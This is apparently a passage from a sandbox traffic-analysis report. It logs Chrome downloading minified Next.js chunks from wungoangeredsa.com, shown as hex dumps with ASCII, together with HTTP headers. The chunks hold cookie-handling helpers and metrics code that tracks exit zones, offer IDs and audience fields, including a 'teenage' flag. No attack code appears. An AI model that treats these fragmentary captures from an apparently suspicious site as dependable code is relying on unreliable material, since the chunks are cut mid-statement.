                                                                                                          2025-01-06 11:09:21 UTC872INData Raw: 37 64 63 30 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 30 31 37 39 5d 2c 7b 35 36 35 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 28 6e 75 6c 6c 3d 3d 74 7c 7c 74 3e 65 2e 6c 65 6e 67 74 68 29 26 26 28 74 3d 65 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 2c 6e 3d 6e 65 77 20 41 72 72 61 79 28 74 29 3b 72 3c 74 3b 72 2b 2b 29 6e 5b 72 5d 3d 65 5b 72
                                                                                                          Data Ascii: 7dc0(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[40179],{5651:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 7b 74 72 79 7b 76 61 72 20 75 3d 65 5b 6f 5d 28 69 29 2c 63 3d 75 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 72 28 73 29 7d 75 2e 64 6f 6e 65 3f 74 28 63 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 63 29 2e 74 68 65 6e 28 6e 2c 61 29 7d 74 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 61 2c 6f 29 7b 76 61 72 20 69 3d 65 2e 61 70 70 6c 79 28 74 2c 6e 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 28 69 2c 61 2c 6f 2c 75 2c 63 2c 22 6e 65 78 74 22 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29
                                                                                                          Data Ascii: {try{var u=e[o](i),c=u.value}catch(s){return void r(s)}u.done?t(c):Promise.resolve(c).then(n,a)}t.Z=function(e){return function(){var t=this,n=arguments;return new Promise((function(a,o){var i=e.apply(t,n);function u(e){r(i,a,o,u,c,"next",e)}function c(e)
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6e 28 65 29 7b 76 61 72 20 74 3d 6e 2e 64 65 66 61 75 6c 74 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 2c 6e 3d 61 2e 64 65 66 61 75 6c 74 28 65 29 3b 69 66 28 74 29 7b 76 61 72 20 69 3d 61 2e 64 65 66 61 75 6c 74 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6e 2c 61 72 67 75 6d 65 6e 74 73 2c 69 29 7d 65 6c 73 65 20 72 3d 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 6f 2e 64 65 66 61 75 6c 74 28 74 68 69 73 2c 72 29 7d 7d 3b 76 61 72 20 6e 3d 69 28 72 28 32 38 34 38 39 29 29 2c 61 3d 69 28 72 28 39 33 34 37 39 29 29 2c 6f 3d 69 28 72 28 37 30 37 31 37 29 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b
                                                                                                          Data Ascii: n(e){var t=n.default();return function(){var r,n=a.default(e);if(t){var i=a.default(this).constructor;r=Reflect.construct(n,arguments,i)}else r=n.apply(this,arguments);return o.default(this,r)}};var n=i(r(28489)),a=i(r(93479)),o=i(r(70717));function i(e){
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 7d 2c 33 30 31 39 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 3d 74 79 70 65 6f 66 20 57 65 61 6b 4d 61 70 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 6e 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 72 65 74 75 72 6e 28 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 6e 3a 74 7d 29 28 65 29 7d 74 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 74 26 26 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 65 3b 69 66 28 6e 75 6c 6c 3d 3d
                                                                                                          Data Ascii: rn e&&e.__esModule?e:{default:e}}},30199:function(e,t){"use strict";function r(e){if("function"!==typeof WeakMap)return null;var t=new WeakMap,n=new WeakMap;return(r=function(e){return e?n:t})(e)}t.Z=function(e,t){if(!t&&e&&e.__esModule)return e;if(null==
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 7d 7d 2c 33 31 31 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 2e 5c 5c 6e 49 6e 20 6f 72 64 65 72 20 74 6f 20 62 65 20 69 74 65 72 61 62 6c 65 2c 20 6e 6f 6e 2d 61 72 72 61 79 20 6f 62 6a 65 63 74 73 20 6d 75 73 74 20 68 61 76 65 20 61 20 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d
                                                                                                          Data Ascii: }},31152:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\\nIn order to be iterable, non-array objects must have a [Symbol.iterator]
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 34 29 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 7d 2c 39 37 38 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 64 65 66 61 75 6c 74 28 65 29 7c 7c 61 2e 64 65 66 61 75 6c 74 28 65 29 7c 7c 69 2e 64 65 66 61 75 6c 74 28 65 29 7c 7c 6f 2e 64 65 66 61 75 6c 74 28 29 7d 3b 76 61 72 20 6e 3d 75 28 72 28 36 31 34 37 36 29 29 2c 61 3d 75 28 72 28 37 38 37 39 32 29 29 2c 6f 3d 75 28 72 28 31 36 32 33 37 29 29 2c 69 3d 75 28 72 28 33 37 33 30 34 29 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e
                                                                                                          Data Ascii: 4));function u(e){return e&&e.__esModule?e:{default:e}}},9788:function(e,t,r){"use strict";t.Z=function(e){return n.default(e)||a.default(e)||i.default(e)||o.default()};var n=u(r(61476)),a=u(r(78792)),o=u(r(16237)),i=u(r(37304));function u(e){return e&&e.
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 74 29 7b 69 66 28 74 2e 68 61 73 28 65 29 29 72 65 74 75 72 6e 20 74 2e 67 65 74 28 65 29 3b 74 2e 73 65 74 28 65 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 72 65 74 75 72 6e 20 6e 2e 64 65 66 61 75 6c 74 28 65 2c 61 72 67 75 6d 65 6e 74 73 2c 6f 2e 64 65 66 61 75 6c 74 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 7d 72 65 74 75 72 6e 20 72 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 72 2c 65
                                                                                                          Data Ascii: er expression must either be null or a function");if("undefined"!==typeof t){if(t.has(e))return t.get(e);t.set(e,r)}function r(){return n.default(e,arguments,o.default(this).constructor)}return r.prototype=Object.create(e.prototype,{constructor:{value:r,e
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 61 64 64 42 61 73 65 50 61 74 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 30 3b 72 65 74 75 72 6e 20 61 2e 6e 6f 72 6d 61 6c 69 7a 65 50 61 74 68 54 72 61 69 6c 69 6e 67 53 6c 61 73 68 28 6e 2e 61 64 64 50 61 74 68 50 72 65 66 69 78 28 65 2c 22 22 29 29 7d 3b 76 61 72 20 6e 3d 72 28 31 31 30 37 37 29 2c 61 3d 72 28 36 30 35 38 33 29 3b 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 26 26 6e 75 6c 6c 21 3d 3d 74 2e 64 65 66 61 75 6c 74 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61
                                                                                                          Data Ascii: erty(t,"__esModule",{value:!0}),t.addBasePath=function(e,t){0;return a.normalizePathTrailingSlash(n.addPathPrefix(e,""))};var n=r(11077),a=r(60583);("function"===typeof t.default||"object"===typeof t.default&&null!==t.default)&&"undefined"===typeof t.defa
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 66 61 75 6c 74 2c 74 29 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 65 66 61 75 6c 74 29 7d 2c 37 34 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 68 61 73 42 61 73 65 50 61 74 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 70 61 74 68 48 61 73 50 72 65 66 69 78 28 65 2c 22 22 29 7d 3b 76 61 72 20 6e 3d 72 28 32 30 38 33 32 29 3b 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 26 26 6e 75 6c 6c 21 3d 3d 74
                                                                                                          Data Ascii: efault,t),e.exports=t.default)},7446:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.hasBasePath=function(e){return n.pathHasPrefix(e,"")};var n=r(20832);("function"===typeof t.default||"object"===typeof t.default&&null!==t
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 7c 6e 75 6c 6c 29 7b 76 61 72 20 6c 3b 28 6e 75 6c 6c 3d 3d 73 7c 7c 6e 75 6c 6c 3d 3d 28 6c 3d 73 2e 74 61 67 4e 61 6d 65 29 3f 76 6f 69 64 20 30 3a 6c 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3d 3d 3d 65 26 26 75 2e 70 75 73 68 28 73 29 7d 76 61 72 20 66 3d 74 2e 6d 61 70 28 6f 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 2c 72 3d 75 2e 6c 65 6e 67 74 68 3b 74 3c 72 3b 74 2b 2b 29 7b 69 66 28 69 28 75 5b 74 5d 2c 65 29 29 72 65 74 75 72 6e 20 75 2e 73 70 6c 69 63 65 28 74 2c 31 29 2c 21 31 7d 72 65 74 75 72 6e 21 30 7d 29 29 3b 75 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 28 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65
                                                                                                          Data Ascii: |null){var l;(null==s||null==(l=s.tagName)?void 0:l.toLowerCase())===e&&u.push(s)}var f=t.map(o).filter((function(e){for(var t=0,r=u.length;t<r;t++){if(i(u[t],e))return u.splice(t,1),!1}return!0}));u.forEach((function(e){var t;return null==(t=e.parentNode


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          34192.168.2.450079104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC553OUTGET /_next/static/chunks/4f5ddda985b24b74-1736072686539-595e9d9ff8fe596a.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-aa4d"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415fd8c54340-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 37 64 63 31 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 32 38 38 38 5d 2c 7b 31 33 34 32 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 70 61 72 73 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 3d 74 79 70 65 6f 66 20 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 72 67 75 6d 65 6e 74 20 73 74 72 20 6d 75 73 74 20 62 65 20 61 20 73 74 72 69 6e 67 22 29 3b 76 61 72 20 74 3d 7b 7d 2c 6e 3d 28 72 7c 7c 7b 7d 29 2e 64 65 63 6f 64 65 7c 7c 6f 2c 69 3d 30 3b 66 6f 72 28 3b 69 3c 65 2e 6c 65 6e 67 74 68 3b 29 7b 76 61
                                                                                                          Data Ascii: 7dc1(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[92888],{13421:function(e,r){"use strict";r.parse=function(e,r){if("string"!==typeof e)throw new TypeError("argument str must be a string");var t={},n=(r||{}).decode||o,i=0;for(;i<e.length;){va
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 77 20 54 79 70 65 45 72 72 6f 72 28 22 6f 70 74 69 6f 6e 20 6d 61 78 41 67 65 20 69 73 20 69 6e 76 61 6c 69 64 22 29 3b 63 2b 3d 22 3b 20 4d 61 78 2d 41 67 65 3d 22 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 6c 29 7d 69 66 28 61 2e 64 6f 6d 61 69 6e 29 7b 69 66 28 21 6e 2e 74 65 73 74 28 61 2e 64 6f 6d 61 69 6e 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6f 70 74 69 6f 6e 20 64 6f 6d 61 69 6e 20 69 73 20 69 6e 76 61 6c 69 64 22 29 3b 63 2b 3d 22 3b 20 44 6f 6d 61 69 6e 3d 22 2b 61 2e 64 6f 6d 61 69 6e 7d 69 66 28 61 2e 70 61 74 68 29 7b 69 66 28 21 6e 2e 74 65 73 74 28 61 2e 70 61 74 68 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6f 70 74 69 6f 6e 20 70 61 74 68 20 69 73 20 69 6e 76 61 6c 69 64 22 29 3b 63 2b 3d
                                                                                                          Data Ascii: w TypeError("option maxAge is invalid");c+="; Max-Age="+Math.floor(l)}if(a.domain){if(!n.test(a.domain))throw new TypeError("option domain is invalid");c+="; Domain="+a.domain}if(a.path){if(!n.test(a.path))throw new TypeError("option path is invalid");c+=
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 7d 7d 7d 2c 33 35 31 39 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 72 2c 74 3d 31 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 3c 6e 3b 74 2b 2b 29 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6f 29 26 26 28 65 5b 6f 5d 3d 72 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 6e 2e 61 70 70 6c 79
                                                                                                          Data Ascii: e}}},35196:function(e,r,t){"use strict";var n=this&&this.__assign||function(){return n=Object.assign||function(e){for(var r,t=1,n=arguments.length;t<n;t++)for(var o in r=arguments[t])Object.prototype.hasOwnProperty.call(r,o)&&(e[o]=r[o]);return e},n.apply
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 63 68 28 72 29 7b 72 65 74 75 72 6e 20 65 7d 7d 3b 72 2e 67 65 74 43 6f 6f 6b 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 75 28 65 29 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 72 65 71 29 72 65 74 75 72 6e 20 63 28 65 2e 72 65 71 2e 63 6f 6f 6b 69 65 73 29 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 6f 6f 6b 69 65 73 29 72 65 74 75 72 6e 20 63 28 65 2e 63 6f 6f 6b 69 65 73 28 29 29 7d 76 61 72 20 72 3b 69 66 28 65 26 26 28 72 3d 65 2e 72 65 71 29 2c 21 61 28 29 29 72 65 74 75 72 6e 20 72 26 26 72 2e 63 6f 6f 6b 69 65 73 3f 72 2e 63 6f 6f 6b 69 65 73 3a 72 26 26 72 2e 68 65 61 64 65 72 73 2e 63 6f 6f 6b 69 65 3f 28 30 2c
                                                                                                          Data Ascii: ch(r){return e}};r.getCookies=function(e){if(u(e)){if(null===e||void 0===e?void 0:e.req)return c(e.req.cookies);if(null===e||void 0===e?void 0:e.cookies)return c(e.cookies())}var r;if(e&&(r=e.req),!a())return r&&r.cookies?r.cookies:r&&r.headers.cookie?(0,
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6d 61 78 41 67 65 3a 2d 31 7d 29 29 7d 3b 72 2e 68 61 73 43 6f 6f 6b 69 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 21 65 26 26 28 30 2c 72 2e 67 65 74 43 6f 6f 6b 69 65 73 29 28 74 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 7d 7d 2c 38 36 35 37 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 28 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 3d 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 22 2f 5f 61 70 70 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 36 37 30 34 35 29 7d 5d 29 7d 2c 36 37 30 34 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 72 29 2c 74 2e 64 28 72 2c 7b 64 65 66 61 75 6c 74 3a 66 75
                                                                                                          Data Ascii: maxAge:-1}))};r.hasCookie=function(e,t){return!!e&&(0,r.getCookies)(t).hasOwnProperty(e)}},86570:function(e,r,t){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_app",function(){return t(67045)}])},67045:function(e,r,t){"use strict";t.r(r),t.d(r,{default:fu
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 75 63 74 6f 72 3b 74 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6e 2c 61 72 67 75 6d 65 6e 74 73 2c 6f 29 7d 65 6c 73 65 20 74 3d 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 6c 28 74 68 69 73 2c 74 29 7d 7d 76 61 72 20 76 3d 74 28 31 32 31 33 39 29 2c 66 3d 74 28 32 39 35 30 35 29 2c 6d 3d 74 28 31 38 33 39 34 29 2c 70 3d 74 28 31 37 39 36 39 29 2c 67 3d 74 28 33 30 31 37 38 29 2c 68 3d 74 28 35 32 39 32 39 29 2c 5f 3d 74 28 39 37 38 39 37 29 2c 62 3d 74 28 37 32 31 38 31 29 2c 79 3d 74 28 35 33 34 34 34 29 2c 50 3d 74 28 32 39 37 35 34 29 2c 77 3d 74 28 33 33 33 39 30 29 2c 53 3d 74 28 39 38 30 38 29 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 28 74 2c 65 29 3b 76 61 72 20 72 3d 64 28 74
                                                                                                          Data Ascii: uctor;t=Reflect.construct(n,arguments,o)}else t=n.apply(this,arguments);return l(this,t)}}var v=t(12139),f=t(29505),m=t(18394),p=t(17969),g=t(30178),h=t(52929),_=t(97897),b=t(72181),y=t(53444),P=t(29754),w=t(33390),S=t(9808),K=function(e){s(t,e);var r=d(t
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 74 2c 6e 2c 6f 2c 69 3d 65 2e 7a 6f 6e 65 2c 61 3d 65 2e 6f 61 69 64 2c 73 3d 74 68 69 73 2e 73 74 61 74 65 2e 6d 65 74 72 69 63 73 43 61 63 68 65 2c 75 3d 28 30 2c 77 2e 44 29 28 7b 65 76 65 6e 74 3a 5f 2e 5f 2e 45 52 52 4f 52 2c 73 75 62 49 64 3a 6e 75 6c 6c 21 3d 3d 28 72 3d 79 2e 6e 2e 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 22 22 2c 65 78 69 74 5a 6f 6e 65 49 64 3a 69 2c 6f 61 69 64 3a 6e 75 6c 6c 21 3d 3d 61 26 26 76 6f 69 64 20 30 21 3d 3d 61 3f 61 3a 79 2e 6e 2e 6f 61 69 64 2c 63 6f 6e 66 69 67 49 64 3a 6e 75 6c 6c 21 3d 3d 28 74 3d 28 30 2c 6d 2e 63 29 28 6c 61 6e 64 44 61 74 61 29 2e 69 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 6e 75 6c 6c 2c 61 70 70 4e 61 6d 65 3a 6e 75 6c 6c 21
                                                                                                          Data Ascii: ction(e){var r,t,n,o,i=e.zone,a=e.oaid,s=this.state.metricsCache,u=(0,w.D)({event:_._.ERROR,subId:null!==(r=y.n.s)&&void 0!==r?r:"",exitZoneId:i,oaid:null!==a&&void 0!==a?a:y.n.oaid,configId:null!==(t=(0,m.c)(landData).id)&&void 0!==t?t:null,appName:null!
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 75 72 6c 3a 69 2c 64 61 74 61 3a 65 7d 29 2e 63 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 4d 65 74 72 69 63 73 20 73 79 6e 63 20 66 61 69 6c 65 64 3a 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 29 29 7d 29 2c 31 30 30 29 7d 29 29 7d 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 74 3d 65 2e 65 76 65 6e 74 2c 6f 3d 65 2e 65 78 69 74 5a 6f 6e 65 49 64 2c 61 3d 65 2e 61 75 64 69 65 6e 63 65 2c 73 3d 65 2e 74 65 65 6e 61 67 65 2c 64 3d 65 2e 73 75 72 76 65 79 2c 76 3d 65 2e 61 70 70 4e 61 6d 65 2c 66 3d 65 2e 73 75 62 49 64 2c 6d 3d 65 2e 6f 61 69 64 2c 70 3d 65 2e 6c 61 6e 64 69 6e 67 4e 61 6d 65 2c 67 3d 65 2e 63 6f 6e 66 69 67 49 64 2c 68 3d 75 2e 6e 2e 6f 66 66 65 72 5f 69 64 2e 6c 65
                                                                                                          Data Ascii: url:i,data:e}).catch((function(){console.error("Metrics sync failed: ".concat(e))}))}),100)}))}},f=function(e){var r,t=e.event,o=e.exitZoneId,a=e.audience,s=e.teenage,d=e.survey,v=e.appName,f=e.subId,m=e.oaid,p=e.landingName,g=e.configId,h=u.n.offer_id.le
